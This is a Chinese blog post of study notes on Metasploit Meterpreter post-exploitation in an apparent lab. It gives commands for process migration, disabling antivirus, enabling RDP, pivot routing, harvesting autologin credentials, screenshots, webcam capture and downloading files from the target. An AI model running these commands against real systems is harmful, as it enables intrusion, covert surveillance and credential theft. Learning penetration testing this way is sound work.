Web安全攻防-----学习笔记(五)之后渗透攻击:信息渗透

最新推荐文章于 2024-04-29 16:05:42 发布
最新推荐文章于 2024-04-29 16:05:42 发布
阅读量2.2k 收藏 9
点赞数 1
分类专栏: 后渗透攻击 web 安全 文章标签: 后渗透攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cxcsdn666/article/details/100811507
版权
web 同时被 3 个专栏收录
16 篇文章 0 订阅
订阅专栏
安全
16 篇文章 0 订阅
订阅专栏
后渗透攻击
3 篇文章 0 订阅
订阅专栏

5.5 后渗透攻击:信息收集

Metasploit提供了一个非常强大的后渗透工具------Meterpreter,该工具具有多重功能,后期渗透模块有200多个,Meterpreter有以下优势。

  • 纯内存工作模式,不需要对磁盘进行任何写入操作
  • 使用加密通信协议,而且可以同时与几个信道通信
  • 在被攻击进程内工作,不需要创建新的进程
  • 易于在多进程之间迁移
  • 平台通用,适用于Windows、Linux、BSD系统,并支持Inter x86和Internal x64平台

5.5.1 进程迁移

在刚获得Meterpreter Shell时,该Shell是极其脆弱和易受攻击的,所以需要移动它,把它和目标机中一个稳定的进程绑定在一起,而不需要对磁盘进行任何写入操作。

输入ps命令:获取目标机正在运行的进程

输入getpid 命令查看Meterpreter Shell的进程号

可以看到进程的PID为1736 ,

输入migrate 1740把shell移动到PID为1740的Explorer.exe  (此处需要自行观察,并非一样的PID)

 

完成进程迁移后,再次输入getpid查看 Meterpreter Shell 的进程号,发现PID已经变成了1740,说明迁移成功。

进程迁移完成后,原先的PID为1736的进程会自动关闭,如果没有自动关闭可以输入kill 1736杀掉进程。 使用自动迁移命令后,系统会自动寻找合适的进程然后迁移。

run post/windows/manage/migrate

5.5.2 系统命令

获得了稳定的进程后,接下来收集信息

先输入sysinfo命令查看目标机的系统信息,例如操作系统和体系结构

输入命令检测目标机是否运行在虚拟机上,

run post/windows/gather/checkvm

选中检测目标机是否正在运行,输入idletime命令可以看到目标机最近的运行时间

 

输入route命令查看目标机完整的网络设置,

 还可以输入background命令将当前会话放在后台,适合在多个Meterpreter会话的场景下使用。还可以输入getuid命令查看当前目标机器上已经渗透成功的用户名。

接着输入命令关闭目标机系统杀毒软件:

run post/windows/manage/killav

输入命令启动目标机的远程桌面协议,也就是常说的3389端口:

run post/windows/manage/enable_rdp

看到已经启动成功,输入命令查看目标机的本地子网情况:

run post/windows/manage/autoroute

 出现错误:The specified meterpreter session script could not be found: post/windows/manage/autoroute

输入background命令将当前Meterpreter终端隐藏在后台,然后输入route add命令添加路由,用route print命令查看:

route add 192.168.1.0 255.255.255.0 1

可以看到地址为192.168.1.0的路由已经被添加到已攻陷主机的路由表中,然后就可以借助被攻陷的主机对其他网络进行攻击。

再回到刚刚关闭的会话:

sessions -i 1

接着输入命令列举当前有多少用户登录了目标机:

run post/windows/gather/enum_logged_on_users

可以看到系统有Administrator用户,并且目前他登录了系统。

再列举安装在目标机上的应用程序:

run post/windows/gather/enum_applications

很多用户习惯将计算机设置为自动登录,下面的命令可以抓取自动登录的用户名和密码:

run windows/gather/credentials/windows_autologin

 

抓取失败,此时需要用到插件Espia,使用前要先输入load espia命令加载该插件,然后输入screengrab(或screenshot)命令就可以抓取此时目标机的屏幕截图:

几个有趣的命令;

查看目标机有没有摄像头:webcam_list

没有摄像头,若有:输入webcam_snap打开目标机摄像头,拍一张照片;

甚至还可输入webcam_stream命令开启直播模式;

输入shell命令进入目标机shell下面;

最好输入exit命令停止Meterpreter会话。

在linux终端启动远程桌面:

rdesktop -u administrator -p ""  192.168.1.105:3389

 

5.5.3 文件系统命令

Meterpreter还支持各种文件系统命令,用于搜索文件并执行各种任务。常用的文件系统命令及其作用如下:

  1. pwd或getpwd:查看当前处于目标机的哪个目录
  2. getlwd:查看当前处于本地的哪个目录
  3. ls:列出当前目录中的所有文件
  4. cd:切换目录
  5. search -f *.txt -d c:\  :可以搜索C盘中所有txt文件,其中-f指定搜索文件模式,-d参数指定在哪个目录下进行搜索
  6. download c:\test.txt /root  :下载到攻击机root下
  7. upload /root/test.txt c:\   :上传到目标机c盘下面

续:Web安全攻防-----学习笔记(五)之后渗透攻击:权限提升

家住海边就爱浪吖
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
内网渗透-Metasploit之——基本后渗透命令
lza20001103的博客
07-18 524
内网渗透-Metasploit之——基本后渗透命令
MSF后渗透
wo41ge的博客
11-24 3691
信息收集 获取目标机器的分区情况: post/windwos/gather/forensics/enum_drives 判断是否为虚拟机 post/windows/gather/checkvm 开启了哪些服务 :post/windwos/gather/enum_services 安装了哪些应用: post/windows/gather/enum_applications 查看共享: post/windows/gather/enum_shares 获取主机最近的系统操作: post/windows/gathe
meterpreter运行run getgui -e报错
xiaolan458的专栏
04-29 251
meterpreter运行run getgui -e报错
Web服务器The specified module could not be found错误解决方法
赵晓雷的专栏
12-08 9526
Internet Information Server的缩写为(IIS)是一个World Wide Web server。Gopher server和FTP server全部包容在里面。 IIS意味着你能发布网页,并且有ASP(Active Server Pages)、JAVA、VBscript产生页面,有着一些扩展功能。IIS支持一些有趣的东西,象有编辑环境的界面(FRONTPAGE)、有全文检
msf之persistence无法正常
2301_78637386的博客
06-20 709
直接使用run persistence -h。如果使用全局地址的话,什么反应也没有。请求大神,能否帮我解释一下。
Web安全学习笔记-Web-Sec Documentation
01-30
Web安全学习笔记——Web-Sec Documentation是一份详细的知识库,旨在帮助读者理解并掌握Web安全相关的理论和技术。文档首先从Web技术的演化、网络攻防技术的发展以及网络安全观的演变三个方面进行阐述,让读者对Web...
Web-安全渗透全套教程20XSS跨.zip
05-22
【标题】"Web-安全渗透全套教程20XSS跨.zip"揭示了这是一份关于Web安全渗透测试的教育资料,特别关注XSS(Cross-Site Scripting,跨站脚本攻击)这一主题。XSS是一种常见的网络安全漏洞,攻击者通过注入恶意脚本到...
HTB-writeups:此仓库包含HackTheBox的文章
05-01
这些文章可能涵盖了不同难度级别的挑战和机器,旨在帮助社区成员了解如何解决特定问题,学习新的攻击技术和防御手段,以及提升信息安全领域的实践能力。"专业实验室"可能指的是HTB中更复杂或专门设计的训练环境,...
Learn-security-from-0:从0开始学安全,注重实战+技巧的运用,分享各种安全攻防干货,包括但不限于:Web安全、代码审计 、内网渗透、企业安全
04-12
我将在这里持续更新我的学习笔记,总结和分享一些有意思的案例,作为知识沉淀和查缺补漏的工具。 ---更新时间:2020.08.27 目录 学习交流 新文章将同步更新到我的个人公众号上,欢迎各位朋友扫描我的公众号二维码...
Python_Study Notes For Web Hacking Web安全学习笔记.zip
最新发布
05-24
总的来说,这份学习笔记提供了从基础到进阶的Python Web安全知识体系,适合对Web安全感兴趣或者希望提升自己安全技能的开发者。通过深入学习和实践,你不仅可以理解Web安全的原理,还能掌握实际的防护和攻击技巧。
HackTheBox-Writes-Ups:HackTheBox CTFC挑战写作
03-20
【标题】"HackTheBox-Writes-Ups:HackTheBox CTFC挑战写作"涉及的是一个网络安全领域的活动,其中“HackTheBox...通过阅读这些材料,读者可以深入了解网络安全攻防的实战技巧,同时学习到如何安全地进行网络渗透测试。
Web安全学习笔记.pdf
10-22
Web安全学习笔记》是一份全面介绍Web安全的资料,涵盖了从基础知识到深入技术的多个层面。本笔记首先概述了Web技术的演进历程及其安全挑战的发展,强调了网络安全的重要性。接下来,它深入探讨了计算机网络的基础...
一生一世学不完系列-红蓝对抗.pdf
09-04
【红蓝对抗】是网络安全领域中的一个重要概念,指的是在安全测试和防御中模拟真实网络攻击与防御的过程。红队代表攻击者,尝试突破系统安全防护,寻找漏洞;蓝队则代表防御者,负责保护系统免受攻击。在这个过程中,...
【推荐】最新超全的渗透测试学习基础教程集合(84份).zip
08-04
01.入门笔记之看雪Web安全学习及异或解密示例; 02.Chrome浏览器保留密码功能渗透解析及登录加密入门笔记; 03.Burp Suite工具安装配置、Proxy基础用法及暴库示例; 04.实验吧CTF实战之WEB渗透和隐写术解密; 05.IDA...
Eastmount网络安全博客之各种工具及代码资源(IDA、BP、Nmap、Wireshark等)
10-11
入门笔记之看雪Web安全学习及异或解密示例 [网络安全自学篇] 二.Chrome浏览器保留密码功能渗透解析及登录加密入门笔记 [网络安全自学篇] 三.Burp Suite工具安装配置、Proxy基础用法及暴库示例 [网络安全自学篇] 四....
Meterpreter命令详解
热门推荐
子曰小玖的博客
08-08 1万+
0x01初识Meterpreter 1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一...
Metasploit常用后渗透脚本——远程监视
渗透测试
06-05 2301
文章目录前言一、迁移进程二、安装远程VNC会话三、关闭杀毒软件四、获取系统密码哈希值五、查看目标机上的所有流量六、提取系统信息七、控制持久化八、查看更多脚本总结 前言 本文详细介绍了metasploit获取meterpreter权限常用的后渗透脚本的功能和实践过程 测试环境 描述 ip 主机 kali 2020 192.168.1.113 靶机 winxp sp3 192.168.1.106 首先使用ms08_067渗透模块对靶机进行渗透测试,详细步骤看 ms08_067漏洞渗透
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值